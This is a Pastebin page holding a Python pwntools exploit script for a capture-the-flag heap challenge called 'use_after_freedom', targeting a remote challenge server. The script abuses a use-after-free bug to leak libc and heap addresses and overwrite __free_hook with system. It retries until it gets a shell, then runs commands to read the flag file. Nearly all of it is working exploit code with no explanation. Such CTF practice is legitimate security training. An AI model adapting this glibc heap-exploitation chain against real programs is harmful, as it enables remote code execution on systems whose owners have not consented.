tacbliw

use after freedom

Jun 15th, 2021
817
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python3
  2. from pwn import *
  3. import argparse
  4. import os
  5.  
  6. # alias "pwninit"="pwninit --template-path=~/tools/ctf/scripts/pwn/pwninit/base.py"
  7.  
  8. exe = ELF("./use_after_freedom", checksec=False)
  9. libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so", checksec=False)
  10. ld = ELF("/lib/x86_64-linux-gnu/ld-2.27.so", checksec=False)
  11. REMOTE_SERVER = "use-after-freedom.hsc.tf"
  12. REMOTE_PORT = 1337
  13.  
  14. GDB_SCRIPT = """
  15. handle SIGALRM ignore
  16. tracemalloc on
  17. breakrva 0x10EB /root/ctf/hsctf21/useafterfreedom/use_after_freedom
  18. """
  19.  
  20. context.binary = exe
  21.  
  22. def get_process(is_remote=None):
  23.     if is_remote:
  24.         p = remote(REMOTE_SERVER, REMOTE_PORT)
  25.     else:
  26.         p = process([exe.path], env={"LD_PRELOAD": libc.path})
  27.     return p
  28.  
  29. def attach_gdb(p, remote=None):
  30.     if not remote:
  31.         gdb.attach(p, gdbscript=GDB_SCRIPT)
  32.  
  33. def create(p, size, data=''):
  34.     p.sendlineafter('> ', '1')
  35.     p.sendlineafter('> ', str(size))
  36.     p.sendlineafter('> ', data)
  37.  
  38. def delete(p, idx):
  39.     p.sendlineafter('> ', '2')
  40.     p.sendlineafter('> ', str(idx))
  41.  
  42. def edit(p, idx, data):
  43.     p.sendlineafter('> ', '3')
  44.     p.sendlineafter('> ', str(idx))
  45.     p.sendafter('> ', data)
  46.  
  47. def show(p, idx):
  48.     p.sendlineafter('> ', '4')
  49.     p.sendlineafter('> ', str(idx))
  50.  
  51.  
  52. if __name__ == '__main__':
  53.     count = 0
  54.     while 1:
  55.         count += 1
  56.         parser = argparse.ArgumentParser()
  57.         parser.add_argument("-r", "--remote", action='store_true', dest='remote', help="Run in remote")
  58.         args = parser.parse_args()
  59.  
  60.         p = get_process(args.remote)
  61.  
  62.  
  63.         try:
  64.             print("Round number", count)
  65.             create(p, 0x418, 'AAAABBBB')
  66.             create(p, 0x18, '/bin/sh\0')
  67.  
  68.             delete(p, 0)
  69.             show(p, 0)
  70.             leakh = u64(p.recvline()[:-1].ljust(8, b'\x00'))# - 0x7faaacba0ca0
  71.             libc.address = leakh - 0x3ebca0
  72.             success(hex(leakh))
  73.             success(hex(libc.address))
  74.  
  75.             delete(p, 1)
  76.             edit(p, 1, "C"*8)
  77.             show(p, 1)
  78.             p.recvuntil("C"*8)
  79.             leak = u64(p.recvline()[:-1].ljust(8, b'\x00'))
  80.             success(hex(leak))
  81.  
  82.             target = (leak & 0xfffff0000000) + 0x479f001 # 0x5607a479f001
  83.             success(hex(target))
  84.             edit(p, 0, p64(leakh) + p64(target))
  85.             p.sendlineafter('> ', '1')
  86.             p.sendlineafter('> ', str(0x418))
  87.             p.sendlineafter("> ","E"*8)
  88.             print("LOLLLL")
  89.             # attach_gdb(p, args.remote)
  90.             edit(p, 1, p64(libc.sym['__free_hook']))
  91.             create(p, 0x18, '/bin/sh\0')
  92.             create(p, 0x18, p64(libc.sym.system))
  93.             delete(p, 4)
  94.             print("DM ", count)
  95.             p.recv()
  96.             p.sendline("ls -la")
  97.             p.sendline("cat f*")
  98.             r = p.recv()
  99.             with open('out.txt', 'wb+') as f:
  100.                 f.write(r)
  101.             break
  102.         except KeyboardInterrupt:
  103.             p.close()
  104.             break
  105.         except:
  106.             print("FAILLLL")
  107.             p.close()
RAW Paste Data